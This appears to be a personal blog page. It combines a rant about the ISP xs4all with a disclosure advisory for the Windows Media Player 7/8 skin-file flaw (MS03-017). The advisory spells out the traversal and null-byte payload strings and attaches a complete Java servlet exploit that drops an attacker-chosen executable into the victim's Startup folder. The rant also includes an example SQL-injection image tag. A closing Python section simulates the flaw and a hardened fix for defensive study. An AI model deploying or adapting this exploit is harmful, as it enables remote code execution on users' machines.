Why I love xs4all rant (you'll probably wanna skip this but I need to get this out of my system):

A few weeks back I was unpleasantly surprised by the fact that my internet wasn't working. The support desk employee, after making me reset my modem a dozen times and triple checking my settings, finally found out that I had an abuse ticket. I supposedly portscanned (a harmless process) :S some poor guy who felt the need to complain about it. They wouldn't tell me who it was, when it happened or anything. This being the second warning (over a 2 year!! period) they decided they had no other alternative than to shut me down. I am not aware of anything I have done wrong, but I am not given any option to defend myself against the allegations. I don't just randomly portscan people. In essence you are convicted without even hearing the evidence or being appointed a lawyer.

This is a really scary thought because in essence any of the following situations will lead to cancellation of your account:

- You actively seek out flaws in a website, you report them to the website owner, he doesn't like this and rather than fix the problem notifies your ISP xs4all to complain about it, resulting in cancellation of your account. You won't even know who complained, and can't explain the whole thing, because xs4all grants the complaining party anonymity.

- You get hacked and someone uses your machine to do something nasty.

- An online chatbuddy asks you to nmap his machine to see if the firewall he set up is working properly. After a while the friendship goes sour and just to piss you off he reports the scanning.

- Someone sends you an email containing all sorts of <img src="http://www.mysite.com/login.asp?username=a'or 1=1;--"> kinda stuff. "Look xs4all!! He hacked my site, just look at my logs", and xs4all's connection logs will show the connections were made from your IP matching the timestamps in the log.

- Probably a dozen other ways are possible, and there's no way to find out what has been going on.

This shielding of the sources is ridiculous. What will I do, tell the world I nmapped him? Well whoopdiedoo, call out the witness protection program. Particularly cute: the other day I saw an interview with Cor Bosman telling how the xs4all founders were titled the hacker threat from Holland etc. I have a 4 letter acronym for him, you figure it out.


Description:

Windows Media Player allows you to play audio and video files locally stored and streamed from the Internet. It includes a visualizer, a jukebox, a media guide, an Internet radio tuner, and support for countless media formats and various external devices.

There is a flaw in Windows Media Player 7 and 8 that allows execution of arbitrary code. Vulnerable versions are shipped by default with all recent Windows distributions, including 98, 2000 and XP.

Details:

Windows Media Player skin (.WMZ) files are automatically opened by Internet Explorer. As a security precaution they are placed in a folder with a random name, similar to this:

C:\Program Files\Windows Media Player\Skins\004B1813

However this can be trivially defeated by setting the following HTTP headers.
Content-Disposition: filename=%2e%2e%5cjelmer.wmz
Content-Type: application/download

<content follows>

%2e%2e%5cjelmer.wmz is the URL-encoded path ..\jelmer.wmz. Windows Media Player URL-decodes this and the path becomes:

C:\Program Files\Windows Media Player\Skins\004B1813\..\jelmer.wmz

which is equivalent to

C:\Program Files\Windows Media Player\Skins\jelmer.wmz

which is a known location on the filesystem, which is a "very bad thing" (tm).

To make matters worse we could append a URL-encoded null byte to the file name and "spoof" the extension, like this:

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CStart%20Menu%5CPrograms%5CStartup%5csomefile.exe%00.wmz

which drops an executable in the Windows startup folder (on an English XP system): the extension check still sees ".wmz", while the file name is cut off at the null byte when the file is written.

Systems affected:

Both Media Player 7.1 and 8 are affected by the flaw; 9 proved unaffected.

Example:

I should have attached a sample exploit.

Vendor status:

Microsoft was notified 23-03-2003 and has issued a fix. The details are available at
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-017.asp

Credit was shared because apparently Jouko reported the same issue at approximately the same time.

Solution:

Update to the latest version of Media Player.


Attachment: MediaPlayerExploit.java

import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.ServletException;
import javax.servlet.ServletOutputStream;
import java.io.*;

/**
 *
 * Microsoft media player 8 Exploit for windows XP English and Dutch versions
 *
 * It will drop a file in the startup folder
 *
 * modify web.xml to change what will be uploaded
 *
 * @author Jelmer Kuperus
 *
 */

public class MediaPlayerExploit extends HttpServlet {

    private static final int BUFFER_SIZE = 1024;

    // URL-encoded "..\" sequences climbing out of the random skin folder,
    // followed by the per-language path of the Startup folder.
    private static final String[] paths = new String[] {
        "%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CStart%20Menu%5CPrograms%5CStartup%5c", // English
        "%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CMenu Start%5CProgramma%27s%5Copstarten%5c" // Dutch
    };

    // Local path of the file to serve, read from the "executable" init parameter in web.xml.
    private String payload;

    public void init() throws ServletException {
        payload = getInitParameter("executable");
    }

    public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {

        int language = 0; // default to english

        try {
            language = Integer.parseInt(request.getParameter("language"));
        } catch (NumberFormatException ignored) {}

        String path = paths[language];

        File file = new File(payload);

        ServletOutputStream sos = response.getOutputStream();

        // The Content-Disposition file name carries the traversal and the "%00.wmz" extension spoof described above.
        response.setContentType("application/download");
        response.setHeader("Content-Disposition", "filename=" + path + file.getName() + "%00.wmz");

        BufferedInputStream bis = new BufferedInputStream(new FileInputStream(file));
        BufferedOutputStream bos = new BufferedOutputStream(sos);

        byte buffer[] = new byte[BUFFER_SIZE];

        int datalength = 0;
        while ((datalength = bis.read(buffer, 0, BUFFER_SIZE)) > 0) {
            bos.write(buffer, 0, datalength);
        }
        bis.close();
        bos.close();
    }

    public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        doGet(request, response);
    }

}
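The Details section describes two separate weaknesses: the URL-decoded "..\" that escapes the random skin folder, and the "%00" that defeats the extension check. The following Python is added here and is not part of the advisory or the attached exploit; it simulates the unsafe resolution described above next to a hardened version. The skin directory value is the advisory's own example, the sample header values are the ones quoted in the advisory, and pure paths are used so that nothing is written to disk.

```python
# Added illustration (not the advisory's or Jelmer Kuperus's code): simulates the
# MS03-017 skin-download path handling with pure paths, so nothing touches a disk.
from pathlib import PureWindowsPath
from urllib.parse import unquote
import re

# Random-named skin folder taken from the advisory's example path.
SKIN_DIR = PureWindowsPath(r"C:\Program Files\Windows Media Player\Skins\004B1813")

def header_filename(content_disposition: str) -> str:
    """Extract the raw filename parameter from a Content-Disposition value."""
    m = re.search(r'filename=("?)([^";]*)\1', content_disposition)
    if not m:
        raise ValueError("no filename parameter")
    return m.group(2)

def normalize(path: PureWindowsPath) -> PureWindowsPath:
    """Collapse '.' and '..' segments lexically, as the file system would."""
    parts = []
    for seg in path.parts[1:]:  # parts[0] is the drive anchor
        if seg == "..":
            if parts:
                parts.pop()
        elif seg != ".":
            parts.append(seg)
    return PureWindowsPath(path.anchor, *parts)

def vulnerable_resolve(content_disposition: str) -> PureWindowsPath:
    """What the advisory describes: URL-decode, check the extension on the
    decoded string, then let the file system honour '..' and stop reading
    the name at the first NUL byte."""
    name = unquote(header_filename(content_disposition))
    if not name.lower().endswith(".wmz"):
        raise ValueError("not a skin file")
    truncated = name.split("\x00", 1)[0]  # C-string truncation at NUL
    return normalize(SKIN_DIR / truncated)

def safe_resolve(content_disposition: str) -> "PureWindowsPath | None":
    """Hardened: decode once, reject NULs and any path syntax, check the
    extension on the final name, and confirm the result stays in SKIN_DIR.
    Returns None for a rejected filename."""
    name = unquote(header_filename(content_disposition))
    if "\x00" in name or any(c in name for c in "\\/:") or name in ("", ".", ".."):
        return None
    if not name.lower().endswith(".wmz"):
        return None
    target = normalize(SKIN_DIR / name)
    return target if target.parent == SKIN_DIR else None
```

Run against the advisory's two header values, vulnerable_resolve lands on Skins\jelmer.wmz and on the Startup folder's somefile.exe respectively, while safe_resolve rejects both and accepts only a plain name such as cool.wmz.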